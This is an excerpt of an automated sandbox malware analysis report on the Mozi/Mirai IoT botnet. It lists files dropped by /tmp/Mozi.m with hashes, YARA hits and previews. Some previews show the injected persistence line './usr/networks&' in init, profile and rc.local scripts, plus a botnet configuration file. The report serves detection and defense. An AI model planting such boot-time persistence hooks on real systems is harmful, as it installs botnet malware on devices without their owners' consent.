                                                                                                        Category:dropped
                                                                                                        Size (bytes):56
                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountnfs-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):249
                                                                                                        Entropy (8bit):4.8916208864241355
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountnfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):190
                                                                                                        Entropy (8bit):3.788938232230384
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/umountnfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):145
                                                                                                        Entropy (8bit):4.730534942677594
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/profile.d/Z97-byobu.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/apps-bin-path.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/bash_completion.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/cedilla-portuguese.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/vte-2.91.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/rc.local
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 0.
                                                                                                        /etc/rcS.d/S95baby.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25
                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                        Encrypted:false
                                                                                                        Malicious:true
                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                        /etc/wpa_supplicant/action_wpa.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):714
                                                                                                        Entropy (8bit):5.329653855555143
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                        /etc/wpa_supplicant/functions.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/wpa_supplicant/ifupdown.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3368
                                                                                                        Entropy (8bit):5.3288648372922625
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                        /tmp/.config
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):284
                                                                                                        Entropy (8bit):4.841045283359712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                        MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                        SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                        SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                        SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                        Malicious:false
                                                                                                        Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                        /usr/bin/gettext.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1914
                                                                                                        Entropy (8bit):4.829445473341419
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                        MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                        SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                        SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                        SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                        /usr/networks
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                        Category:dropped
                                                                                                        Size (bytes):307960
                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                        MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                        SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                        SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                        SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 69%
                                                                                                        /usr/sbin/alsa-info.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text, with very long lines
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25983
                                                                                                        Entropy (8bit):5.455683610707543
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                        MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                        SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                        SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                        SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                        /usr/share/alsa-base/alsa-info.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text, with very long lines
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25464
                                                                                                        Entropy (8bit):5.453877096685684
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                        MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                        SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                        SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                        SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                        /usr/share/alsa/utils.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4725
                                                                                                        Entropy (8bit):5.44928341819888
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                        MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                        SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                        SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                        SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                        /usr/share/brltty/initramfs/brltty.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46
                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/cups-braille.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:UTF-8 Unicode text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3551
                                                                                                        Entropy (8bit):5.478748088887141
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                        MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                        SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                        SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                        SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                        /usr/share/cups/braille/index.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):590
                                                                                                        Entropy (8bit):5.080350031939274
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                        MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                        SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                        SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                        SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/indexv3.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):945
                                                                                                        Entropy (8bit):4.9071581716168575
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                        MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                        SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                        SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                        SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/indexv4.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):818
                                                                                                        Entropy (8bit):4.8178661177968065
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                        MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                        SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                        SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                        SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                        /usr/share/debconf/confmodule.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/acpid/examples/ac.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/acpid/examples/default.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):309
                                                                                                        Entropy (8bit):4.972882784760757
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3647
                                                                                                        Entropy (8bit):4.544491450799858
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                        /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:awk or perl script, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1829
                                                                                                        Entropy (8bit):4.38604786798686
                                                                                                        Encrypted:false
                                                                                                        Malicious:false
